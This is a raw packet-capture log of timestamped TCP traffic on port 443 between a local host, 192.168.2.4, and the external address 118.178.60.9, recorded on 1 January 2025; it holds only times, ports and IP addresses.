Jan 1, 2025 08:31:30.138931990 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.138984919 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.143702984 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.143758059 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.146075010 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.146126032 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.150825977 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.150877953 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.153248072 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.153301954 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.158122063 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.158170938 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.160526991 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.160578966 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.162888050 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.162939072 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.167663097 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.167711973 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.281708956 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.281788111 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.282772064 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.282825947 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.287616014 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.287669897 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.289628983 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.289686918 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.292011023 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.292081118 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.296401978 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.296463013 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.298798084 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.298851967 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.303396940 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.303453922 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.305658102 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.305701971 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.307915926 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.307986021 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.312503099 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.312556982 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.314776897 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.314830065 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.319114923 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.319169998 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.321391106 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.321455956 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.323551893 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.323613882 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.328238964 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.328296900 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.330298901 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.330389023 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.334669113 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.334733963 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.337066889 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.337126017 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.341317892 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.341372967 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.343688011 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.343744993 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.345812082 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.345873117 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.350251913 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.350311995 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.352449894 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.352507114 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.356990099 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.357045889 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.359173059 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.359225988 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.361947060 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.362008095 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.365777969 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.365869045 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.368067026 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.368122101 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.372514009 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.372569084 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.374752998 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.374805927 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.376944065 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.376996994 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.381395102 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.381448030 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.383634090 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.383686066 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.387953997 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.388005018 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.390041113 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.390094995 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.394319057 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.394368887 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.396310091 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.396363974 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.398407936 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.398458958 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.402436972 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.402487040 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.404356956 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.404411077 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.408454895 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.408513069 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.410310030 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.410352945 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.412242889 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.412292957 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.416016102 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.416065931 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.417874098 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.417921066 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.421565056 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.421618938 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.423408031 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.423458099 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.425240993 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.425293922 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.428864002 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.428913116 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.430665016 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.430727005 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.434179068 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.434232950 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.435939074 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.435991049 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.439465046 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.439516068 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.441448927 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.441500902 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.442974091 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.443025112 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.446278095 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.446331978 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.448076010 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.448124886 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.451560974 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.451611042 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.453270912 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.453320026 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.454950094 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.455002069 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.459234953 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.459287882 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.461409092 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.461460114 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.495789051 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.495850086 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.557400942 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.557480097 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.559978008 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.560034990 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.565810919 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.565861940 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.566600084 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.566644907 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.568906069 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.568960905 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.573385000 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.573436022 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.575958967 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.576010942 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.577902079 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.577955008 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.582547903 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.582601070 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.584928036 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.584979057 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.589369059 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.589421034 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.591706991 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.591757059 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.596065998 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.596117020 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.598165035 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.598215103 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.600797892 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.600850105 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.604984045 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.605053902 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.607121944 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.607176065 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.611541033 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.611588001 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.613838911 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.613886118 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.615993023 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.616063118 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.620548964 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.620624065 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.622749090 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.622817993 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.627052069 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.627131939 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.629406929 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.629478931 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.633811951 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.633872032 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.636301994 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.636363983 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.638310909 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.638374090 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.642659903 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.642709970 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.644949913 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.645010948 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.649466038 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.649513006 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.651575089 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.651634932 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.653830051 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.653893948 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.658354044 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.658407927 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.660406113 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.660469055 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.664555073 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.664607048 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.665242910 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.665297985 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.666580915 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.666632891 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.669220924 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.669281006 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.670526981 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.670572996 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.673299074 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.673350096 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.674568892 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.674742937 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.677237988 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.677272081 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.677305937 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.677318096 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.677339077 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.677361012 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.678544998 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.678600073 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.680591106 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.680645943 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.685044050 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.685081005 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.685098886 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.685106039 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.685122013 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.685143948 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.689723969 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.689757109 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.689775944 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.689781904 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.689806938 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.689821959 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.696225882 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.696284056 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.696285009 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.696301937 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.696326971 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.696342945 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.700766087 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.700819969 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.700850964 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.700896025 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.707355976 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.707408905 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.707416058 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.707425117 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.707452059 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.707467079 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.713908911 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.713952065 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.713965893 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.713972092 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.713987112 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.714005947 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.720628977 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.720679998 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.727488995 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.727536917 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.727551937 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.727557898 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.727591038 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.727607012 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.732233047 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.732279062 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.732311964 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.732320070 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.732346058 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.732355118 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.738488913 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.738545895 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.738550901 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.738564968 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.738594055 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.738604069 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.745083094 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.745135069 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.745141983 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.745147943 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.745176077 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.745184898 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.751509905 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.751560926 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.751562119 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.751573086 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.751599073 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.751609087 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.754815102 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.754858971 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.754863024 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.754870892 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.754906893 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.757230997 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.757281065 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.757292032 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.757338047 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.761481047 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.761526108 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.761531115 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.761538982 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.761575937 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.764002085 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.764045954 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.764049053 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.764056921 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.764094114 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.767364979 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.767407894 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.767416000 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.767463923 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.771752119 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.771802902 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.771855116 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.771910906 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.782886982 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.782928944 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.782958031 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.782970905 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.782982111 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.783057928 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.787374973 CET	443	49987	118.178.60.9	192.168.2.4
Jan 1, 2025 08:31:30.787426949 CET	49987	443	192.168.2.4	118.178.60.9
Jan 1, 2025 08:31:30.787484884 CET	443	49987	118.178.60.9	192.168.2.4
